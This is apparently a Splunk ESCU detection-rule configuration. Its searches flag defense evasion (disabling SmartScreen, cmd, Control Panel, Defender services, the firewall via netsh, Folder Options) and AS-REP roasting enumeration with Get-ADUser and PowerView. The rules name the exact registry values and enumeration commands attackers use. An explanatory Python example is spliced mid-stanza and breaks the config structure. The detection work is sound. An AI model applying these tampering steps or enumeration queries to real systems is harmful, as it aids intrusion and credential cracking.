action.notable.param.rule_description = The following search identifies a registry modification that disables Windows SmartScreen. SmartScreen is a Windows feature that provides an early warning against websites that may engage in phishing or malware distribution. This modification is seen in RAT malware to cover its tracks when downloading further components or other payloads.
action.notable.param.rule_title = Disable Windows SmartScreen Protection
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE Registry.registry_path IN ("*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SmartScreenEnabled", "*\\Microsoft\\Windows\\System\\EnableSmartScreen") Registry.registry_value_data IN ("Off", "0") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_smartscreen_protection_filter`

[ESCU - Disabled Kerberos Pre-Authentication Discovery With Get-ADUser - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` cmdlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. With the appropriate parameters, such as a filter on the userAccountControl flag 4194304 (DONT_REQ_PREAUTH), Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre-Authentication disabled.\
Red Teams and adversaries alike may abuse Get-ADUser to enumerate these accounts and attempt to crack their passwords offline (AS-REP roasting).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` cmdlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. With the appropriate parameters, such as a filter on the userAccountControl flag 4194304 (DONT_REQ_PREAUTH), Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre-Authentication disabled.\
Red Teams and adversaries alike may abuse Get-ADUser to enumerate these accounts and attempt to crack their passwords offline (AS-REP roasting).
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may search for accounts with Kerberos Pre-Authentication disabled for legitimate purposes.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabled Kerberos Pre-Authentication Discovery With Get-ADUser - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["CISA AA23-347A", "Active Directory Kerberos Attacks"]
action.risk = 1
action.risk.param._risk_message = Disabled Kerberos Pre-Authentication Discovery With Get-ADUser from $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabled Kerberos Pre-Authentication Discovery With Get-ADUser - Rule
action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` cmdlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. \
With the appropriate parameters, such as a filter on the userAccountControl flag 4194304 (DONT_REQ_PREAUTH), Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre-Authentication disabled.\
Red Teams and adversaries alike may abuse Get-ADUser to enumerate these accounts and attempt to crack their passwords offline (AS-REP roasting).
action.notable.param.rule_title = Disabled Kerberos Pre-Authentication Discovery With Get-ADUser
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-ADUser*" AND ScriptBlockText="*4194304*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabled_kerberos_pre_authentication_discovery_with_get_aduser_filter`

[ESCU - Disabled Kerberos Pre-Authentication Discovery With PowerView - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` cmdlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. As the name suggests, `Get-DomainUser` is used to identify domain users, and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre-Authentication disabled.\
Red Teams and adversaries alike may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline (AS-REP roasting).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` cmdlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. As the name suggests, `Get-DomainUser` is used to identify domain users, and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre-Authentication disabled.\
Red Teams and adversaries alike may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline (AS-REP roasting).
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting.
action.escu.creation_date = 2022-05-03
action.escu.modification_date = 2022-05-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabled Kerberos Pre-Authentication Discovery With PowerView - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Kerberos Attacks"]
action.risk = 1
action.risk.param._risk_message = Disabled Kerberos Pre-Authentication Discovery With PowerView from $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabled Kerberos Pre-Authentication Discovery With PowerView - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` cmdlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. \
As the name suggests, `Get-DomainUser` is used to identify domain users, and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre-Authentication disabled.\
Red Teams and adversaries alike may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline (AS-REP roasting).
action.notable.param.rule_title = Disabled Kerberos Pre-Authentication Discovery With PowerView
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainUser*" AND ScriptBlockText="*PreauthNotRequired*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabled_kerberos_pre_authentication_discovery_with_powerview_filter`

[ESCU - Disabling CMD Application - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables the Windows command prompt (the DisableCMD policy). This technique is commonly seen in RATs, Trojans and worms to prevent an analyst from triaging or deleting their samples through cmd.exe, one of the tools analysts use to traverse directories and files.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables the Windows command prompt (the DisableCMD policy). This technique is commonly seen in RATs, Trojans and worms to prevent an analyst from triaging or deleting their samples through cmd.exe, one of the tools analysts use to traverse directories and files.
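Both Kerberos pre-authentication discovery rules above key on the same attribute: the DONT_REQ_PREAUTH bit of userAccountControl (0x400000, decimal 4194304), queried either through `Get-ADUser` with that literal or through PowerView's `-PreauthNotRequired` switch. The Python below is an added example, not Splunk or security_content code: it applies the two 4104 script-block matchers to constructed script blocks, aggregates hits the way the `stats ... by Computer UserID ScriptBlockText` step does, and shows what the adversary's query resolves to on a constructed set of accounts. Hostnames, SIDs, account names, timestamps and script blocks are made up; case-insensitive matching of the wildcard terms is an assumption about how the search command compares field values.

```python
"""Added example (not part of security_content): the two Kerberos pre-authentication
discovery rules above, run over constructed PowerShell 4104 events."""

# userAccountControl bits (Microsoft-defined). DONT_REQ_PREAUTH is the bit both rules hunt for.
DONT_REQ_PREAUTH = 0x400000        # == 4194304, the literal the Get-ADUser rule looks for
NORMAL_ACCOUNT = 0x200
DONT_EXPIRE_PASSWORD = 0x10000

# (rule name, required substrings): each mirrors `ScriptBlockText="*a*" AND ScriptBlockText="*b*"`.
SCRIPT_BLOCK_RULES = (
    ("Disabled Kerberos Pre-Authentication Discovery With Get-ADUser", ("get-aduser", "4194304")),
    ("Disabled Kerberos Pre-Authentication Discovery With PowerView", ("get-domainuser", "preauthnotrequired")),
)


def classify_script_block(text: str) -> list:
    """Names of the rules whose wildcard terms all occur in the script block (case-insensitive, assumed)."""
    t = text.lower()
    return [name for name, terms in SCRIPT_BLOCK_RULES if all(term in t for term in terms)]


def aggregate(events) -> dict:
    """`stats count min(_time) as firstTime max(_time) as lastTime by Computer UserID ScriptBlockText`
    over the events that matched a rule. Keys are (dest, UserID, ScriptBlockText, rule)."""
    out = {}
    for ev in events:
        if ev.get("EventCode") != 4104:
            continue
        for rule in classify_script_block(ev["ScriptBlockText"]):
            key = (ev["Computer"], ev["UserID"], ev["ScriptBlockText"], rule)
            row = out.setdefault(key, {"count": 0, "firstTime": ev["_time"], "lastTime": ev["_time"]})
            row["count"] += 1
            row["firstTime"] = min(row["firstTime"], ev["_time"])
            row["lastTime"] = max(row["lastTime"], ev["_time"])
    return out


def accounts_without_preauth(accounts: dict) -> list:
    """What the adversary's query returns: the LDAP filter
    (userAccountControl:1.2.840.113556.1.4.803:=4194304) and PowerView's -PreauthNotRequired
    both select accounts with the bit set, i.e. the AS-REP roastable ones."""
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)


# Constructed 4104 events; _time is epoch seconds, script blocks are typical of each tool.
SAMPLE_EVENTS = [
    {"_time": 1700000000, "EventCode": 4104, "Computer": "WS01.corp.local", "UserID": "S-1-5-21-1-2-3-1001",
     "ScriptBlockText": 'Get-ADUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" -Properties userAccountControl'},
    {"_time": 1700000060, "EventCode": 4104, "Computer": "WS01.corp.local", "UserID": "S-1-5-21-1-2-3-1001",
     "ScriptBlockText": 'Get-ADUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" -Properties userAccountControl'},
    {"_time": 1700000120, "EventCode": 4104, "Computer": "WS02.corp.local", "UserID": "S-1-5-21-1-2-3-1002",
     "ScriptBlockText": "Get-DomainUser -PreauthNotRequired | Select-Object samaccountname"},
    {"_time": 1700000180, "EventCode": 4104, "Computer": "WS03.corp.local", "UserID": "S-1-5-21-1-2-3-1003",
     "ScriptBlockText": "Get-ADUser -Identity svc_backup -Properties PasswordLastSet"},   # routine admin query
    {"_time": 1700000240, "EventCode": 4104, "Computer": "WS02.corp.local", "UserID": "S-1-5-21-1-2-3-1002",
     "ScriptBlockText": "Get-DomainUser -SPN"},                                             # Kerberoasting, not this rule
]

# Constructed directory: only svc_legacy and svc_scan have pre-authentication disabled.
SAMPLE_ACCOUNTS = {
    "alice": NORMAL_ACCOUNT,
    "svc_backup": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
    "svc_legacy": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
    "svc_scan": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH,
}

if __name__ == "__main__":
    for key, row in aggregate(SAMPLE_EVENTS).items():
        print(key[0], key[3], row)
    print("AS-REP roastable:", accounts_without_preauth(SAMPLE_ACCOUNTS))
```

The two benign blocks (an `-Identity` lookup and a `-SPN` sweep) fall through both matchers, which is the point of requiring both terms rather than the cmdlet name alone; the repeated WS01 block collapses to one row with `count` 2 and a 60-second first-to-last span, as the stats step would report.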
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An administrator may disable this application for non-technical users.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling CMD Application - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = The Windows command prompt was disabled on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling CMD Application - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies a registry modification that disables the Windows command prompt (the DisableCMD policy). This technique is commonly seen in RATs, Trojans and worms to prevent an analyst from triaging or deleting their samples through cmd.exe, one of the tools analysts use to traverse directories and files.
action.notable.param.rule_title = Disabling CMD Application
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter`

[ESCU - Disabling ControlPanel - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables the Windows Control Panel (the NoControlPanel policy). This technique is commonly seen in malware to prevent its artifacts and persistence from being removed from the infected machine.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables the Windows Control Panel (the NoControlPanel policy). This technique is commonly seen in malware to prevent its artifacts and persistence from being removed from the infected machine.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. \
https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An administrator may disable this application for non-technical users.
action.escu.creation_date = 2024-02-14
action.escu.modification_date = 2024-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling ControlPanel - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = The Windows Control Panel was disabled on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling ControlPanel - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies a registry modification that disables the Windows Control Panel (the NoControlPanel policy). This technique is commonly seen in malware to prevent its artifacts and persistence from being removed from the infected machine.
action.notable.param.rule_title = Disabling ControlPanel
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter`

[ESCU - Disabling Defender Services - Rule]
action.escu = 0
action.escu.enabled = 1
description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. The endpoint should be isolated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. The endpoint should be isolated.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin or user may choose to disable the Windows Defender product.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling Defender Services - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Windows Registry Abuse", "RedLine Stealer"]
action.risk = 1
action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling Defender Services - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Windows Registry Abuse", "RedLine Stealer"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. The endpoint should be isolated.
action.notable.param.rule_title = Disabling Defender Services
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\System\\CurrentControlSet\\Services\\*" AND (Registry.registry_path IN("*WdBoot*", "*WdFilter*", "*WdNisDrv*", "*WdNisSvc*", "*WinDefend*", "*SecurityHealthService*")) AND Registry.registry_value_name = Start Registry.registry_value_data = 0x00000004) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_defender_services_filter`

[ESCU - Disabling Firewall with Netsh - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies suspicious firewall disabling using the netsh application. This technique is commonly seen in malware that tries to communicate with its C2 server or download its components or other payloads.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies suspicious firewall disabling using the netsh application. This technique is commonly seen in malware that tries to communicate with its C2 server or download its components or other payloads.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = An admin may disable the firewall during testing or while fixing a network problem.
action.escu.creation_date = 2021-03-31
action.escu.modification_date = 2021-03-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling Firewall with Netsh - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "BlackByte Ransomware"]
action.risk = 1
action.risk.param._risk_message = The Windows Firewall was disabled on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling Firewall with Netsh - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process= "*firewall*" (Processes.process= "*off*" OR Processes.process= "*disable*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_firewall_with_netsh_filter`

[ESCU - Disabling FolderOptions Windows Feature - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables the Folder Options feature of Windows, which is used to show hidden files, file extensions, and so on. This technique is used by malware in combination with disabling the show-hidden-files feature, to hide its files and also to hide the file extension and lure the user based on file icons or fake file extensions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables the Folder Options feature of Windows, which is used to show hidden files, file extensions, and so on. This technique is used by malware in combination with disabling the show-hidden-files feature, to hide its files and also to hide the file extension and lure the user based on file icons or fake file extensions.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin may disable this application for non-technical users.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling FolderOptions Windows Feature - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = The Windows Folder Options feature, used to show hidden files, was disabled on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling FolderOptions Windows Feature - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies a registry modification that disables the Folder Options feature of Windows, which is used to show hidden files, file extensions, and so on. This technique is used by malware in combination with disabling the show-hidden-files feature, to hide its files and also to hide the file extension and lure the user based on file icons or fake file extensions.
action.notable.param.rule_title = Disabling FolderOptions Windows Feature
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
